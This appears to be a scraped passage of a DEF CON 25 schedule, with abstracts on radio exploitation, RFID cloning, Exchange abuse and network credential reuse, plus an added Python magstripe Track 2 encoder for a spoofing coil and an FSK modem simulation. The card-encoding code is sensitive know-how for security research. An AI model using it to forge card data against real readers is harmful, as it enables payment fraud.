Prerequisites: Basic familiarity with Linux. Python scripting knowledge is a plus, but not essential.

Materials: Latest version of VirtualBox installed; administrative access on your laptop with external USB allowed; at least 20 GB free hard disk space; at least 4 GB RAM (the more the merrier).

Max students: 36 | Registration: https://dc25_chio.eventbrite.com (Sold out!)

Clarence Chio
Clarence Chio @cchio graduated with a B.S. and M.S. in Computer Science from Stanford within 4 years, specializing in data mining and artificial intelligence. He is in the process of co-authoring the O'Reilly book "Machine Learning and Security", and currently works as a Security Researcher and Data Scientist. Clarence spoke on Machine Learning and Security at DEF CON 24, GeekPwn Shanghai, PHDays Moscow, BSides Las Vegas and NYC, Code Blue Tokyo, SecTor Toronto, GrrCon Michigan, Hack in Paris, QCon San Francisco, and DeepSec Vienna (2015-2016). He has been a community speaker with Intel, and is also the founder and organizer of the "Data Mining for Cyber Security" meetup group, the largest gathering of security data scientists in the San Francisco Bay Area.

He has been/will be giving trainings/workshops on machine learning and security at TROOPERS 17 (Heidelberg), HITB Amsterdam 2017, VXCON (Hong Kong), HITB GSEC (Singapore), and AppSec EU (Belfast).

Anto Joseph
Anto Joseph @antojosep007 is a Security Engineer for Intel. He has 4 years of corporate experience in developing and advocating security in machine learning and systems in mobile and web platforms. He is very passionate about exploring new ideas in these areas and has been a presenter and trainer at various security conferences including BH USA 2016, DEF CON 24, BruCon, Hack in Paris, HITB Amsterdam, NullCon, GroundZero, c0c0n, XorConf and more. He is an active contributor to many open-source projects and some of his work is available at https://github.com/antojoseph.



IOT - Main Contest Area - Friday - 14:40-15:30




Demolabs - Table 6 - Saturday - 14:00-15:50


Radare2

Maxime Morin

Saturday from 1400-1550 at Table Six

Audience: A lot of people are currently using radare2 for a large panel of different purposes: binary exploitation, weird CPU architecture reversing, binary diffing, CTFs, emulation. We also try to get new contributors for the project and invite students to collaborate via various platforms such as Google Summer of Code or the Radare Summer of Code, which we try to organize based on donations.

Radare2 is an open-source Reverse-Engineering Framework

> Project URL: http://radare.org/r/
> Git Project URL: https://github.com/radare/radare2

Maxime Morin
French IT Security Consultant living in Amsterdam, I work for FireEye in the i3 team, performing general technical threat analysis (malware analysis, etc.). I'm interested in Reverse Engineering, especially malware-related analysis. I am a modest contributor to the project and part of the core group; I am mainly working on the regression-test suite and mentoring a student for Google Summer of Code for the project this year. I have already done a workshop at BSidesLV and other conferences with other contributors, for example at hack.lu, and "unofficial" workshops in Vegas bars/restaurants. I also rewrote the radare book, which is a quick intro to radare2.



DEFCON - Track 1 - Friday - 16:00-16:45


Radio Exploitation 101: Characterizing, Contextualizing, and Applying Wireless Attack Methods

Friday at 16:00 in 101 Track

45 minutes | Demo

Matt Knight Senior Software Engineer, Threat Research at Bastille

Marc Newlin Security Researcher at Bastille

What do the Dallas tornado siren attack, hacked electric skateboards, and insecure smart door locks have in common? Vulnerable wireless protocols. Exploitation of wireless devices is growing increasingly common, thanks to the proliferation of radio frequency protocols driven by mobile and IoT. While non-Wi-Fi and non-Bluetooth RF protocols remain a mystery to many security practitioners, exploiting them is easier than one might think.

Join us as we walk through the fundamentals of radio exploitation. After introducing essential RF concepts and characteristics, we will develop a wireless threat taxonomy by analyzing and classifying different methods of attack. As we introduce each new attack, we will draw parallels to similar wired network exploits, and highlight attack primitives that are unique to RF. To illustrate these concepts, we will show each attack in practice with a series of live demos built on software-defined and hardware radios.

Attendees will come away from this session with an understanding of the mechanics of wireless network exploitation, and an awareness of how they can bridge their IP network exploitation skills to the wireless domain.

Matt Knight
Matt Knight is a software engineer and applied security researcher at Bastille, with a background in hardware, software, and wireless security. Matt's research focuses on preventing exploitation of the myriad wireless networking technologies that connect embedded devices to the Internet of Things. Notably, in 2016 he exposed the internals of the closed-source LoRa PHY based on blind signal analysis. Matt holds a BE in Electrical Engineering from Dartmouth College.

@embeddedsec

Marc Newlin
Marc Newlin is a wireless security researcher at Bastille, where he discovered the MouseJack and KeySniffer vulnerabilities affecting wireless mice and keyboards. A glutton for challenging side projects, Marc competed solo in two DARPA challenges, placing third in the DARPA Shredder Challenge, and second in the first tournament of the DARPA Spectrum Challenge.

@marcnewlin



DEFCON - Track 1 - Friday - 11:00-11:45


Rage Against the Weaponized AI Propaganda Machine

Friday at 11:00 in 101 Track

45 minutes | 0025

Suggy (AKA Chris Sumner) Researcher, The Online Privacy Foundation

Psychographic targeting and the so called "Weaponized AI Propaganda Machine" have been blamed for swaying public opinion in recent political campaigns. But how effective are they? Why are people so divided on certain topics? And what influences their views? This talk presents the results of five studies exploring each of these questions. The studies examined authoritarianism, threat perception, personality-targeted advertising and biases in relation to support for communication surveillance as a counter-terrorism strategy. We found that people with an authoritarian disposition were more likely to be supportive of surveillance, but that those who are less authoritarian became increasingly supportive of such surveillance the greater they perceived the threat of terrorism. Using psychographic targeting we reached Facebook audiences with significantly different views on surveillance and demonstrated how tailoring pro and anti-surveillance ads based on authoritarianism affected return on marketing investment. Finally, we show how debunking propaganda faces big challenges as biases severely limit a person's ability to interpret evidence which runs contrary to their beliefs. The results illustrate the effectiveness of psychographic targeting and the ease with which individuals' inherent differences and biases can be exploited.

Suggy (AKA Chris Sumner)
Suggy is the lead researcher and co-founder of the not-for-profit Online Privacy Foundation, who contribute to the field of psychological research in online contexts. He has authored papers and spoken on this topic at DEF CON and other noteworthy security, psychology, artificial intelligence and machine learning conferences. For the past 4 years, Suggy has served as a member of the DEF CON CFP review board. By day, he works in security strategy at Hewlett Packard Enterprise.

@thesuggmeister, https://www.onlineprivacyfoundation.org/



DEFCON - Track 2 - Thursday - 15:00-15:30


Real-time RFID Cloning in the Field

Thursday at 15:00 in 101 Track 2

20 minutes | Demo, Tool, Audience Participation

Dennis Maldonado Adversarial Engineer - LARES Consulting

Ever been on a job that required you to clone live RFID credentials? There are many different solutions to cloning RFID in the field and they all work fine, but the process can be slow, tedious, and error prone. What if there was a new way of cloning badges that solved these problems? In this presentation, we will discuss a smarter way for cloning RFID in the field that is vastly more efficient, useful, and just plain cool. We will go over the current tools and methods for long-range RFID cloning, then discuss and demonstrate a new method that will allow you to clone RFID credentials in the field in just seconds, changing the way you perform red team engagements forever.

Dennis Maldonado
Dennis Maldonado is a Security Consultant at LARES Consulting. His current work includes penetration testing, red teaming, and security research. Dennis' focus is encompassing all forms of information security into an assessment in order to better simulate a real world attack against systems and infrastructure. As a security researcher and evangelist, Dennis spends his time sharing what he knows about Information Security with anyone willing to learn. Dennis co-founded Houston Locksport in Houston, Texas, where he shares his love for lock-picking and physical security, as well as Houston Area Hackers Anonymous (HAHA), a meet-up for hackers and InfoSec professionals in the Houston area. Dennis is also a returning speaker to DEF CON, having spoken at DEF CON 23 and DEF CON 24.

@DennisMald



RCV - Palermo room, Promenade level - Saturday - 13:00-13:25


Recon and Bug Bounties - What a great love story!

Abstract

Recon is an important phase in Penetration Testing. But wait, not everyone does that because everyone's busy filling forms with values. Effective recon can often give you access to assets/boxes that are less commonly found by regular penetration testers. The Internet is one of the best ways to find such hosts/assets. There are a bunch of tools available on the internet which can help researchers to get access to such boxes. Is reverse-IP really useful? Is dnsdumpster the only site that can give a list of sub-domains? What if I told you there are many different ways which, combined together, can give you effective results? What if I told you I have got access to many dev/test boxes which should not have been public facing?

In this talk, the speaker will demonstrate a few effective techniques using which researchers/pen testers can do better information gathering. The speaker will also share many stories which allowed him to earn some bounties using these recon techniques. These techniques might also be useful to red teams/incident response teams to identify rogue devices in their organisation which are often missed during normal penetration testing. These might not be "best practices" but are definitely "good practices" and "nice to know" things while doing Penetration Testing.

Plus, the speaker will not just use a presentation but will try to pray to the demo gods for some luck. Definitely some direct and key takeaways for most attendees after the talk.

Speaker Profile

Abhijeth D (@abhijeth) is an AppSec dude at a bank and an Adjunct Lecturer at UNSW in Australia. Previously worked with Adobe Systems, TCS and Sourcenxt. Security Enthusiast in the fields of Penetration Testing, Application / Mobile / Infrastructure Security. Believes in the need for more security awareness and free responsible disclosures. Got lucky in finding a few vulnerabilities with Google, Yahoo, Facebook, Microsoft, Ebay, Dropbox, etc., and is one of the top 5 researchers on Synack, a bug bounty platform.



IOT - Main Contest Area - Saturday - 16:10-16:59




Wireless - Florentine BR I & II - Promenade Level - Friday - 18:00-18:55


Michael Ossmann

Bio

Michael Ossmann is a wireless security researcher who makes hardware for hackers. Best known for the open source HackRF, Ubertooth, and GreatFET projects, he founded Great Scott Gadgets in an effort to put exciting, new tools into the hands of innovative people.

@michaelossmann

Reverse Engineering DSSSSSSSSSSS Extended Cut

Abstract

Direct Sequence Spread Spectrum (DSSS) is a popular modulation technique for wireless communication that reduces the probability of interference and enables sharing of spectrum. It is also the central technology for Low Probability of Detection (LPD) and Low Probability of Intercept (LPI) radio systems. In addition to being used in well known systems such as Wi-Fi, ZigBee, and GPS, DSSS is extremely popular for proprietary satellite communications and for terrestrial radio transmissions that people don't want you to notice. I will show how DSSS signals can be detected much more easily than most people realize, and I will demonstrate techniques for reversing the pseudo-random sequence used in a DSSS implementation.



PHW - Neopolitan BR IV - Promenade Level - Friday - 13:00-14:30


Reverse Engineering Malware 101

Malware Unicorn

This workshop provides the fundamentals of reverse engineering (RE) Windows malware using a hands-on experience with RE tools and techniques. Attendees will be introduced to RE terms and processes, followed by basic x86 assembly, and a review of RE tools and malware techniques. It will conclude with attendees performing a hands-on malware analysis that consists of Triage, Static, and Dynamic analysis.

Prerequisites: Basic understanding of programming C/C++, Python, or Java

Provided: A virtual machine and tools will be provided.

Features: 5 Sections in 1.5 hours:

Amanda (Twitter: @malwareunicorn) absolutely loves malware. She works as a Senior Malware Researcher at Endgame, where her threat research focuses on dynamic behavior detection on both Windows and OSX platforms.




BHV - Pisa Room - Saturday - 16:00-16:59


Title: Reversing Your Own Source Code

Speaker: Cosmo Mielke

About Cosmo Mielke:
Cosmo has a background in astronomy, but he switched to the medical field to study the metabolic syndrome that plagued him his whole life. At the Mayo Clinic he studied the molecular and genetic basis of obesity and diabetes. Currently he is working on a nonprofit citizen science movement to fight the war on obesity with crowdsourced health data. He believes that everyone should have the right to study their own genetic "source code" without restrictions.

For his day job, Cosmo got super inspired by Ghost In The Shell and decided he wanted to learn how to scan his own brain, so he got a job at UCSF as one of their top data scientists in the neurology department. He scans brains for a living. Fun story.

Abstract:
In recent years, direct-to-consumer genetic testing services have given people the freedom to cheaply test their DNA. We have entered a new era where our own biological source code can be explored, allowing hackers to reverse-engineer the most complex machines in the universe: the human body. This data tells us about our ancestral origins, what makes us unique, and how our health may be influenced by our genetic predispositions.

These developments are exciting, but this new frontier is clouded by concerns about safety, privacy, and ethics. Recent developments in governmental regulation bring into question our rights as individuals to freely have our genes tested. We as hackers must unite to ensure that the human source code remains open source.

How do we embrace this technology to promote individual freedoms, accelerate research, and ultimately save lives without this information falling into wrong or abusive hands? How do we as hackers hack ourselves in a safe, responsible way, and what can we expect to happen regarding government regulation? We will discuss these issues, and share our experiences as geneticists in studying our own code to better understand our health. We will also tell you about an open source science experiment we're running that will allow anyone to freely participate in genomic research for the betterment of human health and longevity.




DEFCON - Track 4 - Sunday - 13:00-13:45


Revoke-Obfuscation: PowerShell Obfuscation Detection (And Evasion) Using Science

Sunday at 13:00 in Track 4

45 minutes | Art of Defense, Demo, Tool

Daniel Bohannon (DBO) Senior Consultant, MANDIANT

Lee Holmes Lead Security Architect, Microsoft

Attackers, administrators and many legitimate products rely on PowerShell for their core functionality. However, its power has made it increasingly attractive for attackers and commodity malware authors alike. How do you separate the good from the bad?

A/V signatures applied to command line arguments work sometimes. AMSI-based (Anti-malware Scan Interface) detection performs significantly better. But obfuscation and evasion techniques like Invoke-Obfuscation can and do bypass both approaches.

Revoke-Obfuscation is a framework that transforms evasion into a treacherous deceit. By applying a suite of unique statistical analysis techniques against PowerShell scripts and their structures, what was once a cloak of invisibility is now a spotlight. It works with .evtx files, command lines, scripts, ScriptBlock logs, Module logs, and is easy to extend.

Approaches for evading these detection techniques will be discussed and demonstrated.

Revoke-Obfuscation has been used in numerous Mandiant investigations to successfully identify obfuscated and non-obfuscated malicious PowerShell scripts and commands. It also detects all obfuscation techniques in Invoke-Obfuscation, including two new techniques being released with this presentation.

Daniel Bohannon (DBO)
Daniel Bohannon is a Senior Incident Response Consultant at MANDIANT with over seven years of operations and information security experience. He is the author of the Invoke-Obfuscation and Invoke-CradleCrafter PowerShell obfuscation frameworks.

@danielhbohannon

Lee Holmes
Lee Holmes is the lead security architect of Microsoft's Azure Management group, covering Azure Stack, System Center, and Operations Management Suite. He is author of the Windows PowerShell Cookbook, and an original member of the PowerShell development team.

@Lee_Holmes, http://www.leeholmes.com/blog/



SKY - Verona/Tuin/Trevi - Promenade Level - Sunday - 13:00-13:59


Title:
Robbing the network and ways to get there

1300 Sunday
Keith & Jerel "Low rent Nickerson"

Robbing the network and ways to get there

In this presentation, we discuss the tricky scenarios we faced during internal penetration test engagements and how we have developed a tool to solve those issues.

We want to fill the gap between cracking a password hash (normal user) obtained from NetBIOS/LLMNR/WPAD attacks and compromising the entire Domain, as well as solving a few tricky issues that we as penetration testers face.

There are also scenarios where getting Domain Admin access doesn't mean we have access to all hosts/shares/databases on all hosts in the network. Some of the workstations/servers are in workgroup membership. Some file shares are restricted to certain groups/users in the Active Directory. These file shares might contain sensitive cardholder information, router configuration backups or Personally Identifiable Information (PII) data that are restricted to certain users or groups and are out of bounds to Domain Administrators.

How do we get there? It would be easy for an attacker if all hosts in the network were part of the same Domain membership and the Domain Admin group had access to all file shares in the network. However, in complex organizations, these might not be the scenarios.

The tricky part for an attacker is to find the right account to gain access and to get in and out of the environment fast.

The tool allows you to supply a username and password that you have captured and cracked from Responder or other sources, as well as IP ranges, a subnet or a list of IP addresses.

The tool finds its way around the network and attempts to gain access into the hosts, finds and dumps the passwords/hashes, and reuses them to compromise other hosts in the network.


HHV - Main Contest Area, Pool Level - Friday - 13:00-15:00


Title:
Robo-Sumo

HHV was started when 1057 went around giving some robots out and sitting down with a group to assemble them. This event is open to all who want to bring (or hack together) a bot. More info here

SKY - Verona/Tuin/Trevi - Promenade Level - Saturday - 16:00-16:59


Title:
Rockin' the (vox)Vote

1600 Saturday
algorythm
@rossja
Rockin' the (vox)Vote

VoxVote is a nifty little live voting app that turns out to have terrible security. What happens when you mess with it? Let's find out...


Demolabs - Table 4 - Saturday - 12:00-13:50


Ruler - Pivoting Through Exchange

Etienne Stalmans

Saturday from 1200-1350 at Table Four

Microsoft Exchange has become the de facto gateway into most organisations. By nature, Exchange needs to be externally accessible, and usually falls outside of normal security monitoring. This can allow for the bypass of common security mechanisms. Even when organisations move into the cloud, their Exchange servers still provide access into the internal environment. It has been shown in the past that abusing the rules feature of Outlook, combined with auto-synchronisation through Exchange, can allow for remote code execution.

Furthermore, Exchange offers a covert communication channel outside of the usual HTTP or TCP employed by most malware. Using the mailbox itself, it is possible to create a communication channel that doesn't traverse the normal network boundary, and appears to be normal Exchange behaviour when inspected on the wire.

Introducing Ruler:

During our Red Team assessments, we saw an opportunity to utilise inherent weaknesses of Microsoft Exchange and create a fully-automated tool that aided further breach of the network. Ruler allows for the easier abuse of built-in functionality, including the ability to execute code on every mailbox connected to the Exchange server.

This talk will showcase the numerous features of Ruler, demonstrating how to gain a foothold, pop shells on every connected mailbox, use Exchange as a covert communication channel and maintain a near invisible persistence in the organisation. We will also discuss possible defenses against the demonstrated attacks.

https://github.com/sensepost/ruler

Etienne Stalmans


Return to Index      -     

 

CPV - Florentine Ballroom 4 - Saturday - 16:00-17:00


Title:
rustls: modern, fast, safer TLS

Author:
Joseph Birr-Pixton (Electric Imp)

Abstract:
rustls is a new open-source TLS stack written in Rust. This talk covers past TLS standard and implementation errors, and how those are avoided in rustls's design.

Bio:
I'm Joe, from Cambridge, England. I've been working in crypto, computer security and embedded development since 2005; building HSMs, mobile authentication, and securing IoT devices.
Twitter handle of presenter(s): @jpixton
Website of presenter(s) or content: https://jbp.io

Return to Index      -     

 

Demolabs - Table 5 - Saturday - 12:00-13:50


SamyKam

Salvador Mendoza

Saturday from 1200-1350 at Table Five

Audience: Offense/Defense/Hardware

SamyKam is a new project to pentest mag-stripe information, designed using Samy Kamkar's MagSpoof as a base but in this case built for Raspberry Pi integration. SamyKam is portable hardware that the user can interact with directly over ssh, an OLED display, a phone or a browser to test magnetic card readers or tokenization processes with prepared attacks.

https://salmg.net/2017/01/16/samykam/

Salvador Mendoza
Salvador Mendoza is a security researcher focusing on tokenization processes, mag-stripe information and embedded prototypes. He has presented on tokenization flaws and payment methods at Black Hat USA, DEF CON, DerbyCon, Ekoparty, BugCON and Troopers. Salvador designed different tools to pentest mag-stripe and tokenization processes. His toolset includes MagSpoofPI, JamSpay, TokenGet and lately SamyKam.
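Whatever the front end (ssh, OLED, phone, browser), a MagSpoof-style coil ends up emitting a Track 2 bit stream, and a reader accepts it only if the per-character parity and the trailing LRC check out. The following is an added example, not SamyKam's or MagSpoof's code: a pure-Python Track 2 encoder and decoder using the standard ISO/IEC 7811/7813 layout (5-bit characters, 4 data bits LSB first plus odd parity, ';' start sentinel, '=' field separator, '?' end sentinel, XOR LRC), a Luhn check on the PAN, and a field parser. The sample track is constructed around the well-known 4111... test PAN.

```python
"""Track 2 magnetic-stripe bit layout: 5-bit characters (4 data bits, LSB
first, plus odd parity), start sentinel ';', field separator '=', end
sentinel '?', and a 4-bit LRC over every character from start to end
sentinel inclusive. Added example; not code from any real tool."""
from __future__ import annotations

START_SENTINEL, FIELD_SEPARATOR, END_SENTINEL = ";", "=", "?"


def _char_value(c: str) -> int:
    """Track 2 alphabet is 0x30..0x3F; the low nibble is the 4-bit value."""
    value = ord(c) - 0x30
    if not 0 <= value <= 15:
        raise ValueError(f"{c!r} is not a Track 2 character")
    return value


def _symbol_bits(value: int) -> list[int]:
    """4 data bits LSB first, then a parity bit making the count of ones odd."""
    bits = [(value >> i) & 1 for i in range(4)]
    bits.append(0 if sum(bits) % 2 else 1)
    return bits


def encode_track2(track: str) -> list[int]:
    """Bit stream a spoofing coil would emit, including the trailing LRC symbol."""
    if not (track.startswith(START_SENTINEL) and track.endswith(END_SENTINEL)):
        raise ValueError("track must run from start sentinel to end sentinel")
    bits, lrc = [], 0
    for c in track:
        value = _char_value(c)
        lrc ^= value
        bits.extend(_symbol_bits(value))
    bits.extend(_symbol_bits(lrc))
    return bits


def decode_track2(bits) -> str:
    """Recover the track from a bit stream, skipping leading clocking zeros.
    Raises ValueError on a parity error, bad LRC or truncated stream, which is
    how a reader rejects a badly spoofed card."""
    bits = list(bits)
    start = _symbol_bits(_char_value(START_SENTINEL))
    pos = next((i for i in range(len(bits) - 4) if bits[i:i + 5] == start), None)
    if pos is None:
        raise ValueError("start sentinel not found")
    chars, lrc = [], 0
    while True:
        symbol = bits[pos:pos + 5]
        if len(symbol) < 5:
            raise ValueError("stream truncated before LRC")
        if sum(symbol) % 2 == 0:
            raise ValueError(f"parity error at bit offset {pos}")
        value = sum(b << i for i, b in enumerate(symbol[:4]))
        pos += 5
        if chars and chars[-1] == END_SENTINEL:  # the symbol after '?' is the LRC
            if value != lrc:
                raise ValueError("LRC mismatch")
            return "".join(chars)
        lrc ^= value
        chars.append(chr(0x30 + value))


def luhn_valid(pan: str) -> bool:
    """Mod-10 check applied to the PAN before anything else is looked at."""
    total = 0
    for i, d in enumerate(reversed(pan)):
        n = int(d)
        if i % 2 == 1:
            n = n * 2 - 9 if n * 2 > 9 else n * 2
        total += n
    return total % 10 == 0


def parse_track2(track: str) -> dict:
    """Split a decoded track into its ISO 7813 fields."""
    body = track[1:-1]
    pan, sep, rest = body.partition(FIELD_SEPARATOR)
    if sep != FIELD_SEPARATOR or not pan.isdigit() or not 1 <= len(pan) <= 19:
        raise ValueError("malformed Track 2 body")
    return {
        "pan": pan,
        "luhn_ok": luhn_valid(pan),
        "expiry_yymm": rest[:4],
        "service_code": rest[4:7],
        "discretionary": rest[7:],
    }


# Constructed test track: the classic 4111... test PAN, expiry 9912, service code 101.
SAMPLE_TRACK2 = ";4111111111111111=99121010000000000000?"

if __name__ == "__main__":
    stream = [0] * 16 + encode_track2(SAMPLE_TRACK2) + [0] * 16
    print(parse_track2(decode_track2(stream)))
```

Flipping any single bit in the stream trips either the parity check or the LRC, so a test harness built on this can tell "reader rejected the card" apart from "reader accepted it and the back end declined", which is the distinction that matters when probing tokenization flows.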


Return to Index      -     

 

Workshops - ( Sold Out ) - Octavius 4 - Friday - 10:30-14:30


Scanning the Airwaves: building a cheap trunked radio/pager scanning system

Friday, 10:30 to 14:30 in Octavius 4

Richard Henderson

Bryan Passifiume

Every second of every day, radio communications are flying through the air: many cities around the world have implemented multi-million dollar trunked radio systems for their transit, municipal, public safety, police, fire and EMS radio networks. Have you ever wondered what's being said over the air? Many of these systems are easily listenable with some basic software and very inexpensive hardware dongles originally designed for capturing over-the-air television broadcasts. This workshop will walk you through the basics of trunked radio systems, how they work, and how you can set up a listening post to decode these systems and listen in. We'll also cover the legalities of listening in, and where to find information online about your local radio systems. This workshop will cover setting up and using the Trunk88 scanning software, and how to scan other conventional (non-trunked) radio systems. A free SDR USB stick will be provided to the first 35 attendees. If time permits, we will also quickly walk through scanning popular archaic pager systems like POCSAG.

Prerequisites: None required, only a desire to listen in on the radio systems around you. A basic understanding of radio might help, but is not essential.

Materials: Laptop with Windows installed (no guarantees a VM will work with the hardware, so please set up a proper dual boot on your MacBooks and Linux machines), notepad and pen. The first 35 participants will be given a free SDR/DVB-T USB stick in order to participate in the practical portion of the workshop. Any attendees beyond that will need to purchase their own SDR stick at the vendor village; there should be multiple vendors selling them. No fees are required. A small-capacity USB drive with all the class notes/handouts, frequency lists, and software will also be provided.

Max students: 50 | Registration: https://dc25_henderson.eventbrite.com (Sold out!)

Richard Henderson
Richard Henderson is a writer, researcher, and ham radio/electronics nerd who has worked in infosec and technology for well over a decade. Richard is currently co-authoring a book on cybersecurity for ICS/Scada systems.

Bryan Passifiume
Bryan Passifiume is a journalist, writer and photographer who covers the crime/police beat at Calgary's biggest daily newspaper. A co-founder of the alt-amateur radio group Hamsexy, he's been involved in the monitoring and radio hacking scene for nearly twenty years.


Return to Index      -     

 

Workshops - ( Sold Out ) - Octavius 7 - Thursday - 14:30-18:30


SDR Crash Course: Hacking your way to fun and profit

Thursday, 14:30 to 18:30 in Octavius 7

Neel Pandeya Sr. Software Engineer & Manager, Ettus Research

Nate Temple Support/Software Engineer, Ettus Research

Wireless devices and wireless systems are increasingly becoming a fundamental and integral part of our world, and are becoming more of interest to security research professionals and hobbyists alike. Software Defined Radio (SDR) is rapidly becoming the tool of choice and a necessary skill for exploring and analyzing the wireless world. There has been significant innovation and development over the past several years, and SDR hardware and software has become much more capable and accessible than at any time before.

This workshop will provide a thorough introduction to SDR and will build a solid foundation for getting started in wireless security research. We will first cover the fundamental building blocks of digital signal processing, wireless communications and SDR hardware/software. We will then walk through various hands-on interactive exercises. We will then conclude with live demonstrations of a variety of applications utilizing SDR technology.

The workshop is based on USRP hardware and GNU Radio, an open-source SDR/DSP software framework, as well as other open-source tools. Attendees do not need to pre-install anything before coming to the workshop, and will use a customized Live Linux USB image to boot from.

The workshop will consist of three sections.

In Part One, we will review the theoretical background and fundamentals of wireless communications, DSP, RF and SDR. We will then discuss in detail the software and hardware used in SDR. Next, we will provide an overview of analog and digital modulation schemes, spectrum monitoring, and the identification and analysis of signals using all open-source software.

In Part Two, attendees will be guided step-by-step in the implementation of transmitters and receivers for a variety of analog and digital wireless systems. We will then analyze, inspect and visualize real-world wireless signals such as ASK, FSK, PSK, OFDM, LTE, 802.11.

In Part Three, we will perform a live demonstration of Radio Direction Finding and a wireless Replay Attack. We will then show a demonstration of receiving and demodulating recorded GPS signals, and other satellite signals such as Outernet, APT, LRPT. We will conclude with passively detecting and identifying on-air LTE networks with SDR hardware.
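Part Two's transmitter/receiver exercise is easiest to see end to end in a simulation before touching a USRP. The block below is an added example, not workshop material or Ettus/GNU Radio code: a binary FSK modulator and a non-coherent tone-energy receiver in pure Python, run over a constructed payload with additive Gaussian noise. The sample rate, baud rate and the Bell-202-style 1200/2200 Hz tones are assumptions chosen so that one symbol is exactly 40 samples.

```python
"""Binary FSK transmitter and non-coherent receiver, pure Python (no numpy,
no SDR hardware). Added example; parameters below are assumptions."""
import math
import random

SAMPLE_RATE = 48_000                       # Hz (assumption)
BAUD = 1200
SAMPLES_PER_SYMBOL = SAMPLE_RATE // BAUD   # 40 samples per bit
F_MARK, F_SPACE = 1200, 2200               # tones for 1 and 0 (Bell 202 style, assumption)


def fsk_modulate(bits, sps=SAMPLES_PER_SYMBOL):
    """Continuous-phase BFSK: switch tone per symbol without resetting phase,
    which keeps the spectrum compact, as a real transmitter would."""
    phase, samples = 0.0, []
    for bit in bits:
        step = 2 * math.pi * (F_MARK if bit else F_SPACE) / SAMPLE_RATE
        for _ in range(sps):
            samples.append(math.sin(phase))
            phase = (phase + step) % (2 * math.pi)
    return samples


def tone_energy(chunk, freq):
    """Squared magnitude of the correlation with a complex tone at freq.
    Non-coherent: the receiver never needs the transmitter's carrier phase."""
    i = sum(s * math.cos(2 * math.pi * freq * n / SAMPLE_RATE) for n, s in enumerate(chunk))
    q = sum(s * math.sin(2 * math.pi * freq * n / SAMPLE_RATE) for n, s in enumerate(chunk))
    return i * i + q * q


def fsk_demodulate(samples, sps=SAMPLES_PER_SYMBOL):
    """Decide each symbol by which tone carries more energy in its window."""
    bits = []
    for k in range(0, len(samples) - sps + 1, sps):
        chunk = samples[k:k + sps]
        bits.append(1 if tone_energy(chunk, F_MARK) > tone_energy(chunk, F_SPACE) else 0)
    return bits


def add_awgn(samples, sigma, seed=1):
    """Additive white Gaussian noise with a fixed seed so runs are repeatable."""
    rng = random.Random(seed)
    return [s + rng.gauss(0.0, sigma) for s in samples]


def bytes_to_bits(data: bytes):
    return [(byte >> i) & 1 for byte in data for i in range(8)]   # LSB first


def bits_to_bytes(bits):
    return bytes(sum(bits[k + i] << i for i in range(8)) for k in range(0, len(bits) - 7, 8))


def bit_errors(sent, received):
    return sum(a != b for a, b in zip(sent, received))


SAMPLE_PAYLOAD = b"DEF CON 25"   # constructed payload

if __name__ == "__main__":
    tx_bits = bytes_to_bits(SAMPLE_PAYLOAD)
    rx_bits = fsk_demodulate(add_awgn(fsk_modulate(tx_bits), sigma=0.5))
    print(bits_to_bytes(rx_bits), "bit errors:", bit_errors(tx_bits, rx_bits))
```

With 40 samples per symbol the two tones are nearly orthogonal over a window, so the decision margin is large and the payload survives noise with half the signal amplitude. Raising sigma, or shortening the window by raising the baud rate, is a quick way to watch the bit error rate climb, which is the same trade-off the hands-on USRP exercises expose.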

Prerequisites: Attendees should have some previous experience with Linux, the Linux command line, and a programming language such as C, C++, or Python. Basic familiarity with DSP and RF fundamentals would be helpful but is not required.

Materials: Attendees should bring a laptop with at least 4 GB RAM and two USB ports, where at least one port is USB 3.0. It is recommended that you bring the most powerful laptop that you can, and in general laptops over five years old may not be suitable for the workshop. Attendees should also bring a blank USB 3.0 flash drive, with minimum capacity of 16 GB. Attendees will also be provided USRP SDR hardware to use during the workshop. Optionally, attendees are welcome to bring their own SDR hardware.

Max students: 50 | Registration: https://dc25_pandeya.eventbrite.com (Sold out!)

Neel Pandeya
Neel is a Senior Software Engineer and Manager of the Technical Support Group at Ettus Research. His background and interests are in open-source software development, Linux kernel and embedded software development, wireless and cellular communications, DSP and signal processing, and software-defined radio (SDR). He holds a Bachelor's Degree in electrical engineering (BSEE) from Worcester Polytechnic Institute (WPI), and a Master's Degree in electrical engineering (MSEE) from Northeastern University. He has an Amateur Radio License, and is aspiring to obtain a private pilot license.

Nate Temple
Nate is a Support Engineer/Software Engineer at Ettus Research working in the areas of product support and software development. His background is in Embedded Linux Development, Micro-controller Development, Web Application Development and Security. He is passionate about SDR technology and is active within the community. His general interests are programming, wireless security, amateur radio, radio direction finding, and SATCOM hunting/hacking. He has contributed to many open-source SDR software projects over the years.


Return to Index      -     

 

SEV - Emperors BR II - Friday - 17:30-18:20



Friday July 28 5:30PM 50 mins

SE vs Predator: Using Social Engineering in ways I never thought….
When I started down the path of becoming a professional social engineer, my vision was something like a modern-day version of Sneakers. Instead I was taken down a road that crossed paths with human traffickers, child pornography and the darkest filth on the planet. Out of that darkness I have had the chance to do some truly remarkable things that it is time to share...

Chris Hadnagy:  @humanhacker
Chris is a professional social engineer with over 16 years of experience. His passion is understanding the why, not just the what. Chris has had the opportunity to work with some of the world's greatest minds in learning how to use skills that might not be too common in the infosec industry. You can find out more at www.social-engineer.com


Return to Index      -     

 

DEFCON - Track 4 - Friday - 10:00-10:30


Secret Tools: Learning about Government Surveillance Software You Can't Ever See

Friday at 10:00 in Track 4

20 minutes | 0025

Peyton "Foofus" Engel Attorney at Hurley, Burish & Stanton, S.C.

Imagine that you're accused of a crime, and the basis of the accusation is a log entry generated by a piece of custom software. You might have some questions: does the software work? how accurate is it? how did it get the results that it did? Unfortunately, the software isn't available to the public. And you can't get access to the source code or even a working instance of the software. All you get are assurances that the software is in use by investigators around the globe, and doesn't do anything that law enforcement isn't supposed to be doing. Because you can trust the government, right?

This talk will look at a family of tools designed for investigating peer-to-peer networks. By synthesizing information from dozens of search warrant affidavits, and a few technical sources, we're able to put together at least a partial picture of the software's capabilities. But we'll also look at the reasons the government offers for keeping these tools out of the public eye and talk about whether they make sense. Finally, we'll examine the implications that investigations based on secret capabilities have for justice.

Peyton "Foofus" Engel
After 18 years in IT, with 16 of those years spent in security and penetration testing, Foofus now works as an attorney. But because he's got significant experience with the Internet and security, one area of his practice focuses on consulting with litigants where digital evidence is at stake. In this capacity he does forensic analysis and assists other attorneys with strategy for presenting (or calling into question) computer-based evidence. In his spare time, Foofus enjoys cooking, playing guitar, and opera. Oh, and remember CoffeeWars? Foofus was pretty involved with that.


Return to Index      -     

 

DEFCON - Track 2 - Saturday - 11:00-11:45


